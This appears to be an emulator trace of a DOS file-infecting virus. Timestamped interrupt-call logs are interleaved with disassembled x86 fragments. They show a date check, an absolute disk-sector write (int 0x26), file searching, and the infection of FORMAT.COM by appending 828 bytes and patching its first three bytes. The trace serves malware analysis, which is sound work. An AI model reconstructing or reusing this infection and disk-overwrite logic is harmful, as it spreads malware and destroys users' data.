0x12aba: mov al, byte ptr [si]
0x12abc: nop
0x12abd: nop
0x12abe: mov cx, 0x100
0x12ac1: mov dx, 0
0x12ac4: mov bx, 1
0x12ac7: int 0x26
2018-12-25T11:53:28.112684325Z 42 PC: 12a7a | Get date 0x12a7a: cmp dh, 9
0x12a7d: jge 0x12a82
0x12a7f: jmp 0x12ad0
0x12a81: nop
0x12a82: cmp dl, 8
0x12a85: jge 0x12aa8
0x12a87: jmp 0x12ad0
0x12a89: nop
0x12a8a: cmp cx, 0x7c6
0x12a8e: je 0x12a9d
0x12a90: mov ah, 0x2b
0x12a92: mov cx, 0x7c6
0x12a95: int 0x21
0x12a97: mov ah, 0x2d
0x12a99: mov cl, 1
0x12a9b: int 0x21
0x12a9d: mov ah, 0x2c
0x12a9f: int 0x21
0x12aa1: cmp cl, 0xf
0x12aa4: jae 0x12ab2
2018-12-25T11:53:28.114956559Z 47 PC: 12ad5 | Get disk transfer address
2018-12-25T11:53:28.116122902Z 26 PC: 12ae8 | Set disk transfer address
2018-12-25T11:53:28.117797711Z 78 PC: 12b78 | Find first file
2018-12-25T11:53:28.131725668Z 79 PC: 12b7e | Find next file
2018-12-25T11:53:28.1355423Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.138162144Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.140140664Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.142067883Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.144779635Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.147596103Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.150350506Z 78 PC: 12b78 | Find first file (See above)
2018-12-25T11:53:28.161558098Z 79 PC: 12b7e | Find next file (See above)
2018-12-25T11:53:28.165433248Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T11:53:28.172163356Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T11:53:29.045045446Z 61 PC: 12bd4 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:53:29.052773898Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T11:53:29.054438053Z 44 PC: 12bec | Get time 0x12bec: mov ah, 0x3f
0x12bee: mov cx, 3
0x12bf1: mov dx, 0x69
0x12bf4: nop
0x12bf5: add dx, si
0x12bf7: int 0x21
0x12bf9: jb 0x12c51
0x12bfb: cmp ax, 3
0x12bfe: jne 0x12c51
0x12c00: mov ax, 0x4202
0x12c03: mov cx, 0
0x12c06: mov dx, 0
0x12c09: int 0x21
0x12c0b: jb 0x12c51
0x12c0d: mov cx, ax
0x12c0f: sub ax, 3
0x12c12: mov word ptr [si + 0x6c], ax
0x12c15: nop
0x12c16: add cx, 0x354
0x12c1a: mov di, si
2018-12-25T11:53:29.056879049Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:53:29.063586548Z 66 PC: 12c0b | Move file pointer
2018-12-25T11:53:29.065052532Z 64 PC: 12c30 | Write file or device (Write 828 bytes on handle 5)
2018-12-25T11:53:29.074585674Z 66 PC: 12c42 | Move file pointer
2018-12-25T11:53:29.077512164Z 64 PC: 12c51 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:53:29.080999487Z 87 PC: 12c64 | Get or set file date and time
2018-12-25T11:53:29.082897056Z 62 PC: 12c68 | Close file
2018-12-25T11:53:29.096559054Z 67 PC: 12c77 | Get or set file attributes
2018-12-25T11:53:29.108009691Z 26 PC: 12c84 | Set disk transfer address